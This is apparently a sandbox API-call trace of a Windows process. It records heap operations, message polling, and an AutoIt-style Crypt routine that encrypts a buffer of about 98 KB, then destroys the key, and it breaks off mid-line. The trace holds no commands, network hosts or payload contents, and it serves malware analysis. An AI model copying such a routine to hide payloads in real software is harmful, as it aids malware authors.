1 [0182.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0182.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0182.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0182.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0182.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0182.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0182.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0182.334] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0182.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0182.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0182.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0182.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0182.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0182.335] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0182.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0182.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0182.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0182.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0182.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0182.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0182.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0182.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0182.335] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c28a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0182.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0182.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0182.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0182.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0182.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0182.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0182.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0182.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.337] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.337] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0182.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0182.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.338] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0182.338] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.338] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.338] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0182.338] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.338] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.338] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0182.338] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0182.338] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0182.338] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.338] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.338] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.339] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.339] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x181e2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x181f0) returned 1 [0182.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.340] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.340] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.340] CharLowerBuffW (in: lpsz="byte[98801]", cchLength=0xb | out: lpsz="byte[98801]") returned 0xb [0182.340] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.343] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.343] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.343] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0182.346] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.346] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa8f3e8*, pdwDataLen=0x87e820*=0x181e2, dwBufLen=0x181f0 | out: pbData=0xa8f3e8*, pdwDataLen=0x87e820*=0x181f0) returned 1 [0182.347] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.347] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.347] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.349] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.349] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.349] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.349] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0182.349] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.350] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0182.350] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0182.350] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0182.350] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.350] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.350] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0182.350] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.350] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0182.350] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.360] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.361] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.361] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.370] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.370] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.370] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0182.371] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0182.371] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.371] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0182.371] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.371] CryptDestroyKey (hKey=0x90af18) returned 1 [0182.371] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0182.371] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0182.371] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0182.371] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0182.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0182.371] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 